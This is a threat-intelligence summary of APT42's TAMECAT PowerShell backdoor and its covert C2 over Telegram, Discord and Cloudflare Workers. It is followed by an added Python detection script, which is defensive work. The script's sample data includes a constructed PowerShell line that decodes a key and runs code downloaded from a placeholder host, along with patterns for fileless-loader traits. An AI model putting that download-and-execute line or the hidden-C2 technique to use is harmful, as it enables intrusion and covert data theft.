A sophisticated Iranian state-sponsored espionage campaign attributed to APT42 has used patient social engineering to compromise senior defense and government officials before deploying a modular PowerShell backdoor called TAMECAT. TAMECAT operates primarily in memory, with modules for browser data theft, screen capture, and file crawling, a hardcoded AES-256 key for encrypting its configuration and traffic, and C2 that blends into trusted services such as Telegram, Cloudflare Workers, Discord, and WebDAV, making detection and attribution more difficult. #TAMECAT #APT42
Keypoints
- APT42 targets senior defense and government officials using long-term social engineering and trusted platforms like WhatsApp.
- Infection begins with an obfuscated VBScript loader that performs antivirus checks and conditionally launches PowerShell or curl.
- TAMECAT is a modular, fileless PowerShell backdoor with browser, screen capture, and FileCrawler modules for intelligence collection.
- The malware uses a hardcoded 256-bit AES key for encryption and blends C2 traffic through Cloudflare Workers, Discord, Telegram, and WebDAV.
- Defenders should monitor PowerShell activity and scrutinize traffic to trusted services such as Telegram and Cloudflare for signs of compromise.
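As an added illustration of the detection advice above (example code written for this summary, not from the SecurityOnline report or any vendor tooling), the script below applies two simple checks to constructed log data: it flags scripting hosts (powershell.exe, pwsh.exe, wscript.exe, cscript.exe, curl.exe) that talk to Telegram, Discord, Cloudflare Workers or WebDAV endpoints, and it scores PowerShell script-block text for fileless-loader traits (base64 decode, in-memory Invoke-Expression, remote download to memory, embedded AES key material, screen capture). The domain patterns are assumptions based on the services' public API hostnames, not indicators from the report; every log line and script block is invented for the demo.

```python
import re
from typing import List, NamedTuple, Optional


class Finding(NamedTuple):
    source: str    # "network" or "scriptblock"
    reason: str
    evidence: str


# Processes that should rarely contact chat/CDN services directly (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "curl.exe"}

# Hostname patterns for the trusted services named in the summary. These are
# assumptions drawn from the services' public API endpoints, not report IoCs.
TRUSTED_SERVICE_PATTERNS = {
    "telegram": re.compile(r"(^|\.)api\.telegram\.org$", re.I),
    "discord": re.compile(r"(^|\.)discord(app)?\.com$", re.I),
    "cloudflare-workers": re.compile(r"\.workers\.dev$", re.I),
}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "MOVE", "COPY", "LOCK", "UNLOCK"}

# Traits of an in-memory PowerShell loader; two or more together is reportable.
SCRIPTBLOCK_PATTERNS = [
    ("in-memory execution", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("base64 payload decode", re.compile(r"FromBase64String", re.I)),
    ("reflective assembly load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I)),
    ("remote download to memory",
     re.compile(r"\.(DownloadString|DownloadData)\(|Invoke-WebRequest|Invoke-RestMethod", re.I)),
    ("embedded AES key material",
     re.compile(r"(AesManaged|\[System\.Security\.Cryptography\.Aes\]).*?\.Key\s*=", re.I | re.S)),
    ("screen capture", re.compile(r"System\.Windows\.Forms\.Screen|CopyFromScreen", re.I)),
]

# Constructed proxy/EDR network log: timestamp | process | method | host | path
SAMPLE_NET_LOG = """\
2024-01-10T09:00:01 | chrome.exe | GET | www.example.com | /index.html
2024-01-10T09:00:05 | powershell.exe | POST | api.telegram.org | /botPLACEHOLDER/sendMessage
2024-01-10T09:00:07 | powershell.exe | GET | example-worker.workers.dev | /task
2024-01-10T09:00:09 | powershell.exe | POST | discord.com | /api/webhooks/000/placeholder
2024-01-10T09:00:11 | powershell.exe | PROPFIND | files.example.net | /dav/
2024-01-10T09:00:13 | teams.exe | GET | statics.teams.cdn.office.net | /x.js
2024-01-10T09:00:15 | curl.exe | GET | api.telegram.org | /botPLACEHOLDER/getUpdates
"""

# Constructed script-block logging (Event ID 4104) samples.
BENIGN_BLOCK = "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB"
SUSPECT_BLOCK = (
    "$k=[Convert]::FromBase64String('PLACEHOLDERKEY==');"
    "$aes=[System.Security.Cryptography.Aes]::Create();$aes.Key=$k;"
    "IEX ((New-Object Net.WebClient).DownloadString('https://example-worker.workers.dev/task'))"
)


def parse_net_line(line: str) -> Optional[dict]:
    """Split one pipe-delimited log line into normalised fields."""
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != 5:
        return None
    ts, proc, method, host, path = parts
    return {"ts": ts, "proc": proc.lower(), "method": method.upper(),
            "host": host.lower(), "path": path}


def check_network(lines: List[str]) -> List[Finding]:
    """Flag scripting hosts reaching trusted relay services or speaking WebDAV."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_net_line(line)
        if rec is None or rec["proc"] not in SCRIPT_HOSTS:
            continue
        for name, pat in TRUSTED_SERVICE_PATTERNS.items():
            if pat.search(rec["host"]):
                findings.append(Finding("network", f"{rec['proc']} -> {name}", line.strip()))
                break
        else:
            if rec["method"] in WEBDAV_METHODS:
                findings.append(Finding("network", f"{rec['proc']} WebDAV {rec['method']}", line.strip()))
    return findings


def check_scriptblock(text: str, min_hits: int = 2) -> Optional[Finding]:
    """Report a script block when at least min_hits loader traits co-occur."""
    hits = [name for name, pat in SCRIPTBLOCK_PATTERNS if pat.search(text)]
    if len(hits) >= min_hits:
        return Finding("scriptblock", ", ".join(hits), text[:80])
    return None


def run_demo() -> List[Finding]:
    """Run both checks over the constructed samples and return all findings."""
    findings = check_network(SAMPLE_NET_LOG.splitlines())
    for block in (BENIGN_BLOCK, SUSPECT_BLOCK):
        f = check_scriptblock(block)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f.source}] {f.reason}: {f.evidence}")
```

The network rule deliberately keys on the originating process rather than the destination alone: Telegram or Discord traffic from a browser is routine, the same traffic from powershell.exe or curl.exe is not. The script-block rule requires two co-occurring traits so that a lone `Invoke-WebRequest` in an admin script does not page anyone.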
Read More: https://securityonline.info/tamecat-exposed-apt42s-fileless-backdoor-targets-defense-chiefs/